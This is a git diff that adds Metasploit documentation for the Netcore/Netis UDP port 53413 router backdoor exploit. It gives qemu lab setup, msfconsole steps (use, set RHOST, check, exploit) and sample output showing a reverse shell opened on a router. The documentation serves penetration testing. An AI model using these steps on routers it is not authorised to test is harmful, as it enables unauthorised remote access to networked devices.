add module doc

Author: nixawk

documentation/modules/exploit/linux/misc/netcore_udp_53413_backdoor.md

@@ -0,0 +1,95 @@
+## Vulnerable Devices/Lab
+
+### Vulnerable Devices
+Trend Micro lists "almost all" models as being vulnerable in August 2014.
+
+Vulnerable AND Exploitable:
+
+1. Netcore NI360 second-generation
+ 
+Vulnerable, but not Exploitable via this module (details later):
+
+1. Netis WF2414 firmware V1.4.27001
+
+### Lab Emulation
+1. Install qemu
+2. Download and install mipsel.  Please read the [tutorial](https://people.debian.org/%7Eaurel32/qemu/mipsel/README.txt)
+3. Starts the mipsel lab
+ 1. `qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net nic -net user,hostfwd=tcp::22222-:22,hostfwd=udp::53413-:53413`
+4. Put [vuln_squashfs-root.tar.gz](https://github.com/rapid7/metasploit-framework/files/267284/vuln_squashfs-root.tar.gz) to mipsel lab, extract it.
+ 1. `scp -P22222 vuln_squashfs-root.tar.gz [email protected]:/root`
+ 2. `tar xvf vuln_squashfs-root.tar.gz`
+5. Run vuln programs.
+ 1. `cd nw614 && chroot . /bin/igdmptd`
+
+## Verification Steps
+
+  1. Install the emulator/hardware
+  2. Start msfconsole
+  3. Do: `use exploits/linux/misc/netcore_udp_53413_backdoor`
+  4. Do: `set RHOST <ip>`
+  5. Do: `check`
+  6. Do: `exploit`
+  7. You should get a shell.
+
+## Exploitability
+
+As previously noted, some modules are vulnerable, but not currently exploitable via Metasploit.
+During [testing](https://github.com/rapid7/metasploit-framework/pull/6880#issuecomment-231597626) it was discovered that some modules implement an echo command that does not honor -ne.  While it may be possible to still execute a shell, further investigation would need to be conducted.
+In these cases, it should be possible to use [other scripts](https://github.com/h00die/MSF-Testing-Scripts/blob/master/netis_backdoor.py) to act as a fake interactive shell.
+
+## Scenarios
+
+The following is an example of a vulnerable AND EXPLOITABLE router.
+
+```
+use exploits/linux/misc/netcore_udp_53413_backdoor
+msf exploit(netcore_udp_53413_backdoor) > set RHOST 192.168.1.1
+RHOST => 192.168.1.1
+msf exploit(netcore_udp_53413_backdoor) > check
+[+] The target is vulnerable.
+msf exploit(netcore_udp_53413_backdoor) > run
+
+[*] Started reverse TCP handler on 192.168.1.2:4444
+[*] Exploiting...
+[*] Command Stager progress -  12.54% done (196/1563 bytes)
+[*] Command Stager progress -  25.08% done (392/1563 bytes)
+[*] Command Stager progress -  37.62% done (588/1563 bytes)
+[*] Command Stager progress -  50.16% done (784/1563 bytes)
+[*] Command Stager progress -  62.70% done (980/1563 bytes)
+[*] Command Stager progress -  75.24% done (1176/1563 bytes)
+[*] Command Stager progress -  87.78% done (1372/1563 bytes)
+[*] Command Stager progress - 100.00% done (1563/1563 bytes)
+[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.1:54180) at 2016-05-16 00:52:43 -0500
+
+pwd
+/
+ls
+bin
+cfg
+dev
+etc
+lib
+linuxrc
+log
+proc
+sbin
+sh
+sys
+tmp
+usr
+var
+web
+```
+
+The following is an example of a vulnerable but NOT expoitable router.
+```
+msf > use exploits/linux/misc/netcore_udp_53413_backdoor
+msf exploit(netcore_udp_53413_backdoor) > set rhost 192.168.1.1
+rhost => 192.168.1.1
+msf exploit(netcore_udp_53413_backdoor) > check
+
+[+] Backdoor Unlocked
+[*] Router backdoor triggered, but non-exploitable echo command detected.  Not currently exploitable with Metasploit.
+[*] The target service is running, but could not be validated.
+```